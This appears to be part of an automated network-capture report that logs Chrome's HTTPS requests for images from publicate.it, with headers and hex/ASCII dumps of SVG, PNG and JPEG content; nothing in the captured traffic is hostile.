                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 39 33 61 33 2e 36 33 33 20 33 2e 36 33 33 20 30 20 30 20 31 2d 2e 35 35 38 2d 2e 39 33 63 2d 2e 31 34 2d 2e 33 33 38 2d 2e 32 31 2d 2e 35 39 2d 2e 32 31 2d 2e 37 35 35 20 30 2d 2e 32 33 31 2e 31 32 38 2d 2e 34 35 34 2e 33 38 34 2d 2e 36 36 39 2e 32 35 36 2d 2e 32 31 34 2e 36 30 37 2d 2e 34 30 39 20 31 2e 30 35 33 2d 2e 35 38 32 61 38 2e 35 38 33 20 38 2e 35 38 33 20 30 20 30 20 31 20 31 2e 35 33 36 2d 2e 34 32 31 63 2e 35 37 38 2d 2e 31 30 38 20 31 2e 31 39 2d 2e 31 36 31 20 31 2e 38 33 34 2d 2e 31 36 31 2e 38 39 31 20 30 20 31 2e 36 34 37 2e 30 39 20 32 2e 32 36 37 2e 32 37 32 2e 36 31 39 2e 31 38 32 20 31 2e 31 32 33 2e 34 36 33 20 31 2e 35 31 31 2e 38 34 32 61 33 2e 32 20 33 2e 32 20 30 20 30 20 31 20 2e 38 33 20 31 2e 34 32 35 63 2e 31 36 35 2e 35 37
                                                                                                                                                                                                        Data Ascii: 93a3.633 3.633 0 0 1-.558-.93c-.14-.338-.21-.59-.21-.755 0-.231.128-.454.384-.669.256-.214.607-.409 1.053-.582a8.583 8.583 0 0 1 1.536-.421c.578-.108 1.19-.161 1.834-.161.891 0 1.647.09 2.267.272.619.182 1.123.463 1.511.842a3.2 3.2 0 0 1 .83 1.425c.165.57
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 37 2e 35 39 31 2d 32 2e 37 37 36 7a 6d 36 2e 31 32 20 34 2e 32 36 32 61 34 2e 33 30 37 20 34 2e 33 30 37 20 30 20 30 20 31 2d 2e 32 32 34 2d 31 2e 30 34 31 20 31 31 2e 39 35 20 31 31 2e 39 35 20 30 20 30 20 31 2d 2e 30 35 2d 31 2e 30 39 56 36 2e 32 37 36 63 2e 31 31 36 2d 2e 30 31 37 2e 32 34 2d 2e 30 33 33 2e 33 37 33 2d 2e 30 35 2e 31 31 35 2d 2e 30 31 36 2e 32 33 39 2d 2e 30 32 39 2e 33 37 31 2d 2e 30 33 37 2e 31 33 32 2d 2e 30 30 38 2e 32 36 34 2d 2e 30 31 33 2e 33 39 36 2d 2e 30 31 33 2e 32 36 35 20 30 20 2e 35 33 2e 30 32 35 2e 37 39 33 2e 30 37 35 2e 32 36 34 2e 30 35 2e 35 30 34 2e 31 34 38 2e 37 32 2e 32 39 37 2e 32 31 34 2e 31 34 39 2e 33 38 37 2e 33 35 31 2e 35 32 2e 36 30 37 2e 31 33 31 2e 32 35 36 2e 31 39 37 2e 35 39 2e 31 39 37 20 31 2e 30
                                                                                                                                                                                                        Data Ascii: 7.591-2.776zm6.12 4.262a4.307 4.307 0 0 1-.224-1.041 11.95 11.95 0 0 1-.05-1.09V6.276c.116-.017.24-.033.373-.05.115-.016.239-.029.371-.037.132-.008.264-.013.396-.013.265 0 .53.025.793.075.264.05.504.148.72.297.214.149.387.351.52.607.131.256.197.59.197 1.0
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 20 30 2d 31 2e 32 32 35 2e 32 33 35 2d 31 2e 36 33 32 2e 37 30 36 2d 2e 34 30 37 2e 34 37 31 2d 2e 36 31 20 31 2e 31 32 38 2d 2e 36 31 20 31 2e 39 37 68 34 2e 33 36 7a 6d 38 2e 39 31 32 2d 33 2e 34 33 63 2e 30 39 39 2d 2e 31 34 38 2e 32 33 2d 2e 33 31 32 2e 33 39 36 2d 2e 34 39 33 2e 31 36 35 2d 2e 31 38 2e 33 36 38 2d 2e 33 34 34 2e 36 30 37 2d 2e 34 39 31 2e 32 34 2d 2e 31 34 38 2e 35 30 34 2d 2e 32 37 2e 37 39 33 2d 2e 33 37 2e 32 38 39 2d 2e 30 39 37 2e 35 39 39 2d 2e 31 34 37 2e 39 33 2d 2e 31 34 37 2e 31 39 37 20 30 20 2e 34 30 38 2e 30 31 37 2e 36 33 31 2e 30 35 2e 32 32 33 2e 30 33 33 2e 34 33 2e 30 39 34 2e 36 32 2e 31 38 34 73 2e 33 34 32 2e 32 31 33 2e 34 35 38 2e 33 36 38 61 2e 39 34 33 2e 39 34 33 20 30 20 30 20 31 20 2e 31 37 33 2e 35 37 38
                                                                                                                                                                                                        Data Ascii: 0-1.225.235-1.632.706-.407.471-.61 1.128-.61 1.97h4.36zm8.912-3.43c.099-.148.23-.312.396-.493.165-.18.368-.344.607-.491.24-.148.504-.27.793-.37.289-.097.599-.147.93-.147.197 0 .408.017.631.05.223.033.43.094.62.184s.342.213.458.368a.943.943 0 0 1 .173.578
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC831INData Raw: 31 2e 35 32 34 2d 31 2e 32 34 37 20 36 2e 38 39 38 20 36 2e 38 39 38 20 30 20 30 20 31 20 31 2e 39 38 32 2d 2e 36 33 63 2e 37 31 2d 2e 31 31 35 20 31 2e 33 36 33 2d 2e 31 38 39 20 31 2e 39 35 37 2d 2e 32 32 32 2e 31 39 39 2d 2e 30 31 36 2e 33 39 32 2d 2e 30 32 35 2e 35 38 33 2d 2e 30 32 35 68 2e 35 33 32 76 2d 2e 34 35 63 30 2d 2e 36 33 36 2d 2e 31 37 2d 31 2e 30 38 37 2d 2e 35 30 38 2d 31 2e 33 35 34 2d 2e 33 33 39 2d 2e 32 36 37 2d 2e 38 38 38 2d 2e 34 2d 31 2e 36 34 37 2d 2e 34 2d 2e 37 31 20 30 2d 31 2e 33 34 32 2e 31 31 35 2d 31 2e 38 39 36 2e 33 34 36 2d 2e 35 35 33 2e 32 33 31 2d 31 2e 30 39 34 2e 34 39 35 2d 31 2e 36 32 33 2e 37 39 33 61 33 2e 36 33 38 20 33 2e 36 33 38 20 30 20 30 20 31 2d 2e 35 35 37 2d 2e 39 33 63 2d 2e 31 34 2d 2e 33 33 38 2d
                                                                                                                                                                                                        Data Ascii: 1.524-1.247 6.898 6.898 0 0 1 1.982-.63c.71-.115 1.363-.189 1.957-.222.199-.016.392-.025.583-.025h.532v-.45c0-.636-.17-1.087-.508-1.354-.339-.267-.888-.4-1.647-.4-.71 0-1.342.115-1.896.346-.553.231-1.094.495-1.623.793a3.638 3.638 0 0 1-.557-.93c-.14-.338-


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        62192.168.2.549820104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC556OUTGET /images/home_banner-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 31919
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "7caf-620aa1d1f6bca"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XYOqZvd7Dl1Zv5%2FbnYl3gXtqMoixfzxZMdd69C5l68ZFzmRmCf4ZHnTqLsfu7V7Dhv%2BliF1jB4KYfIFZaqu%2F8%2FtrFwFxrZiH0DkKd1ye5%2BRB%2BRyeVGqj76kb3hpQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b20b748c9b-EWR
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC616INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 ba 08 03 00 00 00 c9 5a 44 a4 00 00 03 00 50 4c 54 45 4c 69 71 2e 2f 2f df eb f3 e5 ec f1 01 01 01 f2 f8 fc f0 f7 fb 01 01 01 06 06 06 07 07 07 e0 e6 eb 3c 3e 3f e9 ef f2 ce d6 dd ba c3 c8 f4 f9 fe f3 f8 fc f4 f9 fd 80 83 85 f3 f9 fd d8 e7 f3 ff ff ff f3 f4 f4 cc e3 f4 f1 f2 f3 cd e4 f5 d4 e6 f3 fe ff ff f9 fa fb ce e4 f5 cd e4 f5 f0 f2 f3 f3 f7 fa bb d0 e0 be d4 e4 e4 ea ee 87 97 b0 e2 ef f9 ff ff ff fe fe fe 00 78 d4 f4 fa fe e5 ea ed e3 e8 ec f5 ef eb fe fe fd f6 f7 f8 f3 f5 f7 fa fb fc f2 f9 fd ef f3 f5 f8 f9 fa fc fd fd f3 ed ea e9 ee f0 e9 e5 e9 e3 de e2 e6 e1 e5 d4 d1 d3 ea e8 eb 01 6f d1 04 08 09 f0 eb e7 03 7a d4 d7 d4 d7 ff ff fe d2 cd ce db d8 da db d5 d1 70 ba ba fe c8 94 34
                                                                                                                                                                                                        Data Ascii: PNGIHDRZDPLTELiq.//<>?xozp4
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: c8 7d 78 7b b6 d8 f5 b2 b3 9d a4 aa 8f c3 b9 b1 8a 93 74 f5 d4 6c aa bf d5 fc b8 50 94 9e ae 6c 74 4c 56 72 8d bd bd a7 50 5d 2f ed d9 a3 09 8b 8e 72 88 a1 15 82 d5 08 62 ac f1 bd 72 f7 5a 88 b7 74 5d 79 83 69 f7 7d 9c c6 1e 1b 67 7d 98 d4 9e 56 1c 90 dd d8 c4 86 35 54 6e eb b0 bd 11 72 c1 ec a4 3a b8 93 1a 1b 43 52 86 9d b2 cd a3 36 b2 aa 6b 74 74 27 8a 8f 44 a6 9f 4b 9a ba c9 04 65 6e ee 99 ac d5 b9 62 6f 7d e2 92 aa ba 1f c7 fc e6 13 62 50 da fe eb 4d 42 43 b9 f0 54 b8 70 59 8e 88 71 a0 9b 9e 13 45 4f 60 dd 46 9d 9a 33 e4 f1 f1 70 60 08 87 e6 a2 4b 81 08 a2 37 b2 4d 0c 56 31 c8 08 00 00 00 26 74 52 4e 53 00 12 05 4e 0a fd fd 0d 02 06 71 0e 89 49 29 96 ef d9 1d f6 31 c3 d1 b4 a9 a1 63 bb e0 86 c2 9d b5 82 a5 db d6 bc dd 19 e9 a3 00 00 00 09 70 48 59 73
                                                                                                                                                                                                        Data Ascii: }x{tlPltLVrP]/rbrZt]yi}g}V5Tnr:CR6ktt'DKenbo}bPMBCTpYqEO`F3p`K7MV1&tRNSNqI)1cpHYs
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 58 a1 1b 8b c9 5a 83 ed f8 da 8d ef 6d a2 2e 3a f4 20 bf ad 0e 39 41 0e 41 41 39 5b 19 41 0c 87 20 06 16 74 c2 35 c7 35 c8 81 91 e3 b7 f4 4e a7 9a 22 e5 59 0a ad db b8 61 9a 57 b2 76 c3 46 ea e2 42 67 62 41 85 d0 4f cb 71 82 6f 27 72 82 82 82 b0 a0 20 f8 11 94 13 94 b3 84 d0 75 69 53 ed 57 6c 32 7e e2 b3 a8 da f4 de e6 69 c9 52 57 2c 3e f4 9c 40 20 ec 10 b4 35 28 27 c7 2f d0 21 08 43 cc d1 d7 52 40 9f 44 7b cd 8f de 79 f7 dd 37 de 7d dd 78 09 cf 12 88 ba f9 bd b5 a6 7f 10 ca ec c3 bb 93 8b 2b c3 89 e1 ea c0 70 64 38 3a 38 39 39 3a 61 0c 3f 27 27 27 07 86 6b 61 d0 a2 42 d7 a5 bd ce 7e c5 6b 3f 7a e7 8d b7 e0 e1 99 ef ae 7f 03 fb 11 ec a0 63 b1 da bc 61 11 8e 59 ea 9c b2 f7 69 fe e2 e4 00 0b 20 17 01 fa 54 da ef be a5 be 7f 97 77 d7 bf b3 fe 2d cc d9 a2 8d
                                                                                                                                                                                                        Data Ascii: XZm.: 9AAA9[A t55N"YaWvFBgbAOqo'r uiSWl2~iRW,>@ 5('/!CR@D{y7}x+pd8:899:a?'''kaB~k?zcaYi Tw-
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: bc e7 01 5a 82 a8 86 8e 73 93 3d 18 65 fa 44 8e 4c c9 17 ce 7c 66 a7 53 ec 28 6b 27 07 a0 97 cd e8 14 ca a6 45 5c d7 44 35 94 c8 69 60 69 be 99 d6 e9 f6 2f 66 4e 5d de 46 87 17 b8 78 83 2e d4 c9 89 9c 51 bb 6a b3 71 ba 1d 85 ba 61 b3 c9 77 dc 78 29 b5 76 d3 9c c3 fb 36 a3 1d 02 2f 80 be 69 9a bd d3 74 46 1c 67 73 5c 58 a5 0f 96 b2 e9 bd 59 43 df 4e 72 5e 38 6d cd 3d 6c 9f 31 bc af 7b 6f 9a d9 cb d4 8d 9a 2e 09 75 93 d5 e8 53 34 73 f9 79 dd f4 3b c5 53 0d 42 d7 e9 a3 6b c9 2d 00 ff 8c d0 a7 af 2b d9 2f c2 96 99 16 ac 8d 33 25 fc 6b 37 cc b0 c5 2c 65 2a 74 a2 74 ae f6 bc 0e ec c9 89 de 6c bd 3e 53 78 87 29 62 a6 da 45 69 79 6b dd 4c 93 ac a8 50 ed 99 ee 8d a5 4e 53 86 55 b3 d5 b7 fa 5c dd 4e f6 f7 5f d0 65 9b 5e f6 cb bc 9f 36 59 2b 36 19 6d b8 65 e6 eb 56
                                                                                                                                                                                                        Data Ascii: Zs=eDL|fS(k'E\D5i`i/fN]Fx.Qjqawx)v6/itFgs\XYCNr^8m=l1{o.uS4sy;SBk-+/3%k7,e*ttl>Sx)bEiykLPNSU\N_e^6Y+6meV
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: f2 50 7e 4e 78 3d 2a 8c c7 a9 4b ad 53 b6 0f 14 2b 95 2d ca 81 81 56 a5 72 40 19 06 66 26 62 3f 47 5e 97 aa cc 2d 6d 1f 28 1d e8 4a 95 0f b4 2b db b6 c1 ff 5b a1 9b 33 f4 a8 30 5e 1d a7 ae 3d 75 a0 b8 b5 b5 ab a5 b9 bd a5 8e c7 23 91 aa 13 35 b9 b4 a5 a5 5d 55 dc da d5 da 5a a6 4c ad 2c ee 0a 53 c7 02 04 5d da d6 5a da 3c d0 ae 6c 55 76 b5 94 b6 ca 39 2d 75 56 a7 9b 33 f4 10 44 15 72 77 65 8b b2 0e d9 bd b5 4e 4e 42 27 bb 6b 1c b9 9c d3 d6 d2 ae 6a 6d 6d 6d 29 55 b5 b4 ab 06 5a ea 38 1a a7 87 71 a4 52 4e 9d b2 ac 52 d5 c5 51 2a 07 5a a4 ec 81 01 48 df e7 ec 74 dd cd 40 ad d2 7f 6b ec 8d 0c 3d 2a 2c 8c 27 ef 52 b6 b4 0f 28 05 28 72 b7 70 ba ba 88 fc 5d ed 65 b9 bc ae 2e b5 b5 74 a0 45 d9 ae ea 92 9e 51 a9 94 3a d0 79 9c d4 ae ae d4 ae 76 49 59 7b 8b b2 b5
                                                                                                                                                                                                        Data Ascii: P~Nx=*KS+-Vr@f&b?G^-m(J+[30^=u#5]UZL,S]Z<lUv9-uV3DrweNNB'kjmmm)UZ8qRNRQ*ZHt@k=*,'R((rp]e.tEQ:yvIY{
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: ab cd 44 1b 37 2d 18 ba 1d 7a d7 75 a0 ef e4 c8 0b 92 f8 e3 1d 8f 46 ab 1f 1d 51 4d 0c 8d 1c b9 7a 7b b4 bb 7b 04 d5 67 50 92 26 4f ca 16 8e 74 8c 75 4b ba 27 46 47 87 86 c6 24 23 aa f1 11 55 28 a4 72 44 55 3e 72 8c db 3d 34 a4 ea ee ee ee 8e ee 51 75 ab ba bb 5b 46 ea 76 5a 28 74 92 b9 de 9b b6 72 e9 44 b1 df f0 a6 dd 7c ff 79 b5 9e 74 a1 cb 39 f2 b1 fd a3 63 dd 4f 7f 71 e3 d1 f1 cf c7 46 47 1f fe fc e9 91 d1 71 54 a0 21 46 55 af 34 4a c6 21 8d eb f8 39 04 78 c9 d8 cf 87 ba 25 dd 43 e4 d5 52 79 5d b1 ea 18 77 64 48 d5 ad 2a 53 0d f5 4c 48 ba 55 a3 43 43 ca 9d 61 16 07 9d c8 dc 75 99 af 5c 72 51 fe e1 1f 28 0b bd 8f d5 53 a0 47 c9 0b ba f2 1f 8e 86 8f de e8 78 3a 7a f5 67 37 46 47 9f 4e 3c fd d5 43 c2 ea 68 50 35 ed de 38 57 d2 9d 3c 3e 3a 3e 31 d6 fd f4
                                                                                                                                                                                                        Data Ascii: D7-zuFQMz{{gP&OtuK'FG$#U(rDU>r=4Qu[FvZ(trD|yt9cOqFGqT!FU4J!9x%CRy]wdH*SLHUCCau\rQ(SGx:zg7FGN<ChP58W<>:>1
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: c8 a0 a5 b6 11 71 19 33 0f 11 10 5d 70 1f 1f 8c e9 c8 d4 79 fe 38 86 33 e8 36 b6 f4 4d 94 49 d0 8d 56 90 a3 31 a7 b6 e9 38 86 ef fd 6e 92 f6 4e 09 ef e6 42 fd 0d 68 d1 a1 a4 48 be 22 ac e0 53 8c 09 f3 04 be 20 ab d5 18 53 dd 5c e9 1c 00 66 20 1c c3 1c 99 10 8c 7c 30 1c a8 6b 0e 5a 1c 66 b0 d8 7e b0 c6 64 d0 0d 65 ef 38 e6 fa f5 14 b9 62 e6 0c 1d 9c 82 44 c3 9a be fd e3 36 8c 89 7d 7a fb ea cf 91 e5 31 26 cc 31 41 83 c7 44 fc 37 13 e1 38 e6 e2 82 31 b1 a6 67 4c 67 8c 89 f2 50 cd 15 8e b6 86 a0 43 64 30 4e 31 c0 40 78 c7 b1 ad df 7d 0d 1f 3a fa ce 15 de 3c f3 87 ce c4 1e 7c fb ed d1 07 58 d3 1f cb af 76 40 8c 77 95 c9 04 9a 57 c6 12 b0 c0 f7 66 21 1c f3 71 84 49 30 cf fe 86 d1 7c c0 f3 9a f6 13 9f 16 ba 8b d1 f2 38 6d 22 87 46 5a 99 4c 67 6c ab 5e 68 ef 85
                                                                                                                                                                                                        Data Ascii: q3]py836MIV18nNBhH"S S\f |0kZf~de8bD6}z1&1AD781gLgPCd0N1@x}:<|Xv@wWf!qI0|8m"FZLgl^h
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 2f e8 a4 0f eb 5e 36 e8 b8 2e 74 08 ef 3e 96 0d 9d e9 e2 e8 84 ac 3e 5b 31 9d 5f a3 a0 d3 85 bd 34 d0 71 7d e8 37 89 5d 0e 2c 1c ba 63 88 93 e1 f5 90 b4 49 62 d2 98 34 9c f9 fe 4a b3 3a d9 ae c9 a1 13 84 99 0d 6a e8 0f 60 73 13 53 52 c7 4d 0f 1d e2 7b 88 93 f3 2c ef 93 e9 f2 93 57 c9 d3 6a bf 3c 4e f7 c1 e8 37 ff f3 7f fe 67 2f 40 ff fb 7f fc c7 37 4d a6 2d c1 e3 a6 86 4e 2c 5b 75 0a 09 31 b4 c3 e6 bb 93 f5 c6 8f 7f 82 ce 20 6a 46 cc 17 c1 e9 3e f8 cd ff 21 74 e8 ef ff 81 f4 4d 93 25 3b 1d 27 3b 6d 4e 21 93 e5 e7 b0 d5 61 dd 94 73 4d ac a4 50 5e 35 af e8 be 18 d0 e9 ff f3 07 c4 fc 0f 87 08 e6 ff f1 e7 1a b4 7b 95 25 42 c7 48 ab 23 ea 93 b1 3b 6c 75 d5 83 ae 3e 8d 0c 9c b9 c9 ac 4e db b4 08 6d 3a fd 3f ff f0 87 ff f9 9f 3f fc 81 84 fe e7 3f ff b9 c6 94 6d
                                                                                                                                                                                                        Data Ascii: /^6.t>>[1_4q}7],cIb4J:j`sSRM{,Wj<N7g/@7M-N,[u1 jF>!tM%;';mN!asMP^5{%BH#;lu>Nm:???m
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 6e a2 ec 93 98 e3 c9 b0 b5 a1 bf 4b b5 5b 3c e6 24 f8 79 60 9f 67 97 0d 87 9d 4f 2d 21 91 5b b9 f2 55 ca db f4 b7 e8 0c 27 93 a6 9e 18 5a de 42 5f 83 72 f7 45 a5 4e 66 8b 73 ea 24 cc bb cb 86 59 46 97 6d e5 ca 95 76 eb 5e a7 db d2 19 0c 74 2e 70 13 c9 05 31 7f 07 a5 ee 8b 6d 76 b2 ea 37 07 ea cb bd 38 b3 72 e5 ca 95 94 b5 74 ba 2d dd 86 c1 70 34 c6 59 95 0d 9d 68 99 c1 a0 d3 df a2 bf 4b 76 d2 c9 5e 9b a9 35 7f ea c6 2b c3 1a 61 1e 8c 51 c2 07 3e 19 fa ea d5 94 b5 6f d1 6d 6d 60 82 24 c3 d6 14 1f b6 36 36 36 36 f4 37 34 85 99 45 93 1e f5 d9 b7 eb 46 ac bd e3 98 cb c2 72 36 e3 ac 43 c1 a7 38 7d f5 6a ca ba f7 e9 74 ba 8d 49 f4 16 22 4e a7 ff e4 d5 45 67 ae e5 4e 54 81 96 c2 e9 cc ad 0b eb 9d a9 4f 73 68 7c e8 ab 29 94 15 ef bf 45 37 9d 5e 7f db 9e b2 7a e5
                                                                                                                                                                                                        Data Ascii: nK[<$y`gO-![U'ZB_rENfs$YFmv^t.p1mv78rt-p4YhKv^5+aQ>omm`$666674EFr6C8}jtI"NEgNTOsh|)E7^z
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1369INData Raw: 67 cd d6 e9 76 ef d3 6d 6c f1 9b 55 5b 2c 55 bb e0 53 27 4a ed aa ba cf f8 80 6e 4b df ac 5e ad 67 dc 44 4e 93 bf 13 1e d6 b1 3c 38 1d 77 72 0d b9 28 cc 4e bc 72 2e 9c 1f 5e 22 f7 23 8e 0d 6d 16 a0 6b 73 f4 a9 6e d7 0d 37 ee c0 1a b5 eb 93 3b 6d 1a e8 64 22 47 04 78 c2 ea 2f 76 fa 6a 14 dd 99 87 f4 8c 6e 51 81 de 73 4b 95 e7 16 4f 4f ed 1f 76 41 80 d7 c6 77 23 87 77 a2 51 d7 89 ee 9a 8b 21 ee 21 3e 98 5b e4 a9 62 be 58 94 9d 1d 97 9d 1d 17 1a e6 11 16 16 16 b5 03 e6 32 ef d8 e1 06 97 35 de df b1 63 2b f2 fb 64 ab 13 99 1b 50 d6 73 ba 96 3b b4 e8 81 be 81 7a 5d 36 04 1d c5 76 16 8b fd 42 a7 bf 4a b1 a7 d3 6d 9c 1d f4 29 7b 7a 56 11 7f 50 fb bf ca 7c 03 c1 ae 86 5d f7 f7 56 1d da ab 7d 86 bb aa 0e b9 c0 3c 7b e3 b7 e9 a8 98 a2 89 ef ea 56 9a c4 1e e2 12 b8
                                                                                                                                                                                                        Data Ascii: gvmlU[,US'JnK^gDN<8wr(Nr.^"#mksn7;md"Gx/vjnQsKOOvAw#wQ!!>[bX25c+dPs;z]6vBJm){zVP|]V}<{V


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        63192.168.2.549823104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC779OUTGET /images/nhph1-p-500.jpg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC756INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 22921
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "5989-620aa1d14fbe0"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lttXWkxM3L58jMDZ1z%2BUZ7bWxXgdMQBC4dhEcf3LjEOYIxdhjNQ7XG3PgxE%2BIYYilL9QfNzTl3ReRlJXrd5HD%2FiIIR4wCNkxvgZ9p%2B%2F%2BBIrhtpMO1tTrl5ZI%2FBwj3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b27c6c42fc-EWR
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC613INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 a8 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 04 01 03 05 06 07 02 08 ff c4 00 57 10 00 01 03 02 01 05 09 0b 07 09 06 05 04 02 03 00 01 00 02 03 04 11 05 06 12 13 21 31 07 16 32 33 41 51 55 71 93 14 17 22 52 61 72 81 91 92 a1 d1 15 53 54 62 b1 b2 d2 23 34 35 42 63 74
                                                                                                                                                                                                        Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("W!123AQUq"RarSTb#45Bct
